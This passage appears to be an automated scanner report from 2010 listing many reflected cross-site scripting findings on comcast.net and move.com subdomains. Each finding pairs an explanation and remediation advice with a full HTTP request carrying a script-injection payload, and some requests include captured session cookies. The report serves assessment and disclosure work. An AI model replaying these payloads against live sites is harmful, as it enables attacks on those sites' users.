<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html> <head> <title>404 Not Found</title> <script type='text/javascript'> function redirect() { document.location = 'http:/ ...[SNIP]... <p>The requested URL /dc5c1</noscript><script>alert(1)</script>22c38537d71/s6/filter-casual/MacGames was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as text between NOSCRIPT tags. The payload b1b9d</noscript><script>alert(1)</script>4a6c6e6c8c9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within NOSCRIPT tags does not prevent XSS attacks if the user is able to close the NOSCRIPT tag.
Request
GET /t_03cm/s6b1b9d</noscript><script>alert(1)</script>4a6c6e6c8c9/filter-casual/MacGames HTTP/1.1 Host: games.comcast.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html> <head> <title>404 Not Found</title> <script type='text/javascript'> function redirect() { document.location = 'http:/ ...[SNIP]... <p>The requested URL /t_03cm/s6b1b9d</noscript><script>alert(1)</script>4a6c6e6c8c9/filter-casual/MacGames was not found on this server.</p> ...[SNIP]...
2.59. http://moving.move.com/Move/Moving/Default.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://moving.move.com
Path:
/Move/Moving/Default.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload de42a</script><script>alert(1)</script>185f2068544 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Move/Moving/Default.asp?de42a</script><script>alert(1)</script>185f2068544=1 HTTP/1.1 Host: moving.move.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Sun, 19 Dec 2010 18:13:14 GMT X-Powered-By: ASP.NET Content-Length: 39615 Content-Type: text/html Set-Cookie: DART=AdPops=move%7C%3A%3A12%2F19%2F2010+11%3A28%3A15+AM; expires=Mon, 19-Dec-2011 18:13:14 GMT; path=/ Cache-control: private
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <!-- Not @ HOMS --> <!-- homestore.comMOV/move/moving/default.asp@ -->
} function validateUSZip( strValue ) { /****************************************** ...[SNIP]...
2.60. http://moving.move.com/move/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://moving.move.com
Path:
/move/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d6723'-alert(1)-'369fa1d63f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /move/?d6723'-alert(1)-'369fa1d63f=1 HTTP/1.1 Host: moving.move.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Sun, 19 Dec 2010 18:13:13 GMT X-Powered-By: ASP.NET Content-Length: 69841 Content-Type: text/html Set-Cookie: DART=AdPops=move%7C%3A%3A12%2F19%2F2010+11%3A28%3A13+AM; expires=Mon, 19-Dec-2011 18:13:14 GMT; path=/ Cache-control: private
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <!-- Not @ HOMS --> <!-- homestore.comMOV/move/default.asp@ -->
2.61. http://moving.move.com/move/default.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://moving.move.com
Path:
/move/default.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload be453'-alert(1)-'aa41f058865 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /move/default.asp?be453'-alert(1)-'aa41f058865=1 HTTP/1.1 Host: moving.move.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Sun, 19 Dec 2010 18:13:14 GMT X-Powered-By: ASP.NET Content-Length: 69842 Content-Type: text/html Set-Cookie: DART=AdPops=move%7C%3A%3A12%2F19%2F2010+11%3A28%3A14+AM; expires=Mon, 19-Dec-2011 18:13:14 GMT; path=/ Cache-control: private
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <!-- Not @ HOMS --> <!-- homestore.comMOV/move/default.asp@ -->
2.62. http://newhomes.move.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://newhomes.move.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 654a4"><script>alert(1)</script>8b33e015dd7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?654a4"><script>alert(1)</script>8b33e015dd7=1 HTTP/1.1 Host: newhomes.move.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
2.63. http://newhomes.move.com/comcast/communityresults/market-100/city-elgin [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://newhomes.move.com
Path:
/comcast/communityresults/market-100/city-elgin
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94e94"><script>alert(1)</script>d77209e2310 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /comcast/communityresults/market-100/city-elgin?94e94"><script>alert(1)</script>d77209e2310=1 HTTP/1.1 Host: newhomes.move.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
2.64. http://newhomes.move.com/comcast/communityresults/market-100/city-elgin [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://newhomes.move.com
Path:
/comcast/communityresults/market-100/city-elgin
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 98ac7--><script>alert(1)</script>ac0c2d01358 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /comcast/communityresults/market-100/city-elgin?98ac7--><script>alert(1)</script>ac0c2d01358=1 HTTP/1.1 Host: newhomes.move.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
2.65. http://newhomes.move.com/comcast/communityresults/market-112 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://newhomes.move.com
Path:
/comcast/communityresults/market-112
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 6873e--><script>alert(1)</script>4919b76ff04 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /comcast/communityresults/market-112?6873e--><script>alert(1)</script>4919b76ff04=1 HTTP/1.1 Host: newhomes.move.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
2.66. http://newhomes.move.com/comcast/communityresults/market-112 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://newhomes.move.com
Path:
/comcast/communityresults/market-112
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dfb31"><script>alert(1)</script>b122dc6b5fa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /comcast/communityresults/market-112?dfb31"><script>alert(1)</script>b122dc6b5fa=1 HTTP/1.1 Host: newhomes.move.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
2.67. http://newhomes.move.com/comcast/communityresults/market-174 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://newhomes.move.com
Path:
/comcast/communityresults/market-174
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 634c0--><script>alert(1)</script>24754516b9a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /comcast/communityresults/market-174?634c0--><script>alert(1)</script>24754516b9a=1 HTTP/1.1 Host: newhomes.move.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
2.68. http://newhomes.move.com/comcast/communityresults/market-174 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://newhomes.move.com
Path:
/comcast/communityresults/market-174
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a4b60"><script>alert(1)</script>efb2d8e3b8d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /comcast/communityresults/market-174?a4b60"><script>alert(1)</script>efb2d8e3b8d=1 HTTP/1.1 Host: newhomes.move.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 42dbc"><script>alert(1)</script>82ed0c235b1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /comcast/communityresults/market-174/city-fort+mill?42dbc"><script>alert(1)</script>82ed0c235b1=1 HTTP/1.1 Host: newhomes.move.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 46d92--><script>alert(1)</script>7f5af089e29 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /comcast/communityresults/market-174/city-fort+mill?46d92--><script>alert(1)</script>7f5af089e29=1 HTTP/1.1 Host: newhomes.move.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
2.71. http://newhomes.move.com/comcast/communityresults/market-177 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://newhomes.move.com
Path:
/comcast/communityresults/market-177
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 506e9--><script>alert(1)</script>d887f385758 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /comcast/communityresults/market-177?506e9--><script>alert(1)</script>d887f385758=1 HTTP/1.1 Host: newhomes.move.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
2.72. http://newhomes.move.com/comcast/communityresults/market-177 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://newhomes.move.com
Path:
/comcast/communityresults/market-177
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c2032"><script>alert(1)</script>4cf364eea8b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /comcast/communityresults/market-177?c2032"><script>alert(1)</script>4cf364eea8b=1 HTTP/1.1 Host: newhomes.move.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
2.73. http://newhomes.move.com/comcast/communityresults/market-18 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://newhomes.move.com
Path:
/comcast/communityresults/market-18
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f9751"><script>alert(1)</script>db94b3e8444 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /comcast/communityresults/market-18?f9751"><script>alert(1)</script>db94b3e8444=1 HTTP/1.1 Host: newhomes.move.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
2.74. http://newhomes.move.com/comcast/communityresults/market-18 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://newhomes.move.com
Path:
/comcast/communityresults/market-18
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 162ed--><script>alert(1)</script>28afb1b29a8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /comcast/communityresults/market-18?162ed--><script>alert(1)</script>28afb1b29a8=1 HTTP/1.1 Host: newhomes.move.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
2.75. http://newhomes.move.com/comcast/communityresults/market-18/city-avondale [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://newhomes.move.com
Path:
/comcast/communityresults/market-18/city-avondale
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac969"><script>alert(1)</script>b554311ff46 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /comcast/communityresults/market-18/city-avondale?ac969"><script>alert(1)</script>b554311ff46=1 HTTP/1.1 Host: newhomes.move.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
2.76. http://newhomes.move.com/comcast/communityresults/market-18/city-avondale [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://newhomes.move.com
Path:
/comcast/communityresults/market-18/city-avondale
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload e7457--><script>alert(1)</script>71771dcee16 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /comcast/communityresults/market-18/city-avondale?e7457--><script>alert(1)</script>71771dcee16=1 HTTP/1.1 Host: newhomes.move.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
2.77. http://newhomes.move.com/comcast/communityresults/market-18/city-buckeye [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://newhomes.move.com
Path:
/comcast/communityresults/market-18/city-buckeye
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 207b1"><script>alert(1)</script>4ee4cd55297 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /comcast/communityresults/market-18/city-buckeye?207b1"><script>alert(1)</script>4ee4cd55297=1 HTTP/1.1 Host: newhomes.move.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
2.78. http://newhomes.move.com/comcast/communityresults/market-18/city-buckeye [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://newhomes.move.com
Path:
/comcast/communityresults/market-18/city-buckeye
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 60fb9--><script>alert(1)</script>bb17cbf6454 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /comcast/communityresults/market-18/city-buckeye?60fb9--><script>alert(1)</script>bb17cbf6454=1 HTTP/1.1 Host: newhomes.move.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
2.79. http://newhomes.move.com/comcast/communityresults/market-84/city-cumming [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://newhomes.move.com
Path:
/comcast/communityresults/market-84/city-cumming
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 939a2"><script>alert(1)</script>e5a48127910 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /comcast/communityresults/market-84/city-cumming?939a2"><script>alert(1)</script>e5a48127910=1 HTTP/1.1 Host: newhomes.move.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
2.80. http://newhomes.move.com/comcast/communityresults/market-84/city-cumming [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://newhomes.move.com
Path:
/comcast/communityresults/market-84/city-cumming
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 8eeab--><script>alert(1)</script>e67e3e5ac27 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /comcast/communityresults/market-84/city-cumming?8eeab--><script>alert(1)</script>e67e3e5ac27=1 HTTP/1.1 Host: newhomes.move.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
2.81. http://newhomes.move.com/comcast/communityresults/market-84/city-fairburn [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://newhomes.move.com
Path:
/comcast/communityresults/market-84/city-fairburn
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 87cb2"><script>alert(1)</script>7ee17c50deb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /comcast/communityresults/market-84/city-fairburn?87cb2"><script>alert(1)</script>7ee17c50deb=1 HTTP/1.1 Host: newhomes.move.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
2.82. http://newhomes.move.com/comcast/communityresults/market-84/city-fairburn [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://newhomes.move.com
Path:
/comcast/communityresults/market-84/city-fairburn
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload eee0f--><script>alert(1)</script>09637d22ded was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /comcast/communityresults/market-84/city-fairburn?eee0f--><script>alert(1)</script>09637d22ded=1 HTTP/1.1 Host: newhomes.move.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload eceb9--><script>alert(1)</script>5ed8962a388 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /comcast/communityresults/market-88/city-brunswick?eceb9--><script>alert(1)</script>5ed8962a388=1 HTTP/1.1 Host: newhomes.move.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8f3d6"><script>alert(1)</script>bb971aa3775 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /comcast/communityresults/market-88/city-brunswick?8f3d6"><script>alert(1)</script>bb971aa3775=1 HTTP/1.1 Host: newhomes.move.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
2.85. http://newhomesresource.move.com/home/default.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://newhomesresource.move.com
Path:
/home/default.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2bccb"><script>alert(1)</script>564fcb63a16 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /home/default.asp?2bccb"><script>alert(1)</script>564fcb63a16=1 HTTP/1.1 Host: newhomesresource.move.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Sun, 19 Dec 2010 18:13:59 GMT X-Powered-By: ASP.NET Content-Length: 6887 Content-Type: text/html Expires: Sun, 12 Dec 2010 19:33:59 GMT Set-Cookie: Resource=FirstURL=%2Fhome%2Fdefault%2Easp%3F2bccb%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E564fcb63a16%3D1; path=/ Set-Cookie: ASPSESSIONIDCAADCABR=JFBKCHGCKMIDKNMBIEIOHBPM; path=/ Cache-control: private
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload db79e"><script>alert(1)</script>59b0b45d706 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_lx.ads/comcast.netdb79e"><script>alert(1)</script>59b0b45d706/home/L16/1147364285/x37/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a HTTP/1.1 Host: oascentral.comcast.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NSC_d10efm_qppm_iuuq=ffffffff09419e4d45525d5f4f58455e445a4a423660; page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; fsr.a=1292781874650; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;
Response
HTTP/1.1 200 OK Date: Sun, 19 Dec 2010 18:08:38 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 644 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/plain
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 16474"><script>alert(1)</script>d5ba4c93f37 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_lx.ads/comcast.net/home16474"><script>alert(1)</script>d5ba4c93f37/L16/1147364285/x37/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a HTTP/1.1 Host: oascentral.comcast.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NSC_d10efm_qppm_iuuq=ffffffff09419e4d45525d5f4f58455e445a4a423660; page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; fsr.a=1292781874650; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;
Response
HTTP/1.1 200 OK Date: Sun, 19 Dec 2010 18:08:38 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 644 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/plain
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f84a0"><script>alert(1)</script>ca5da6eb0ab was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
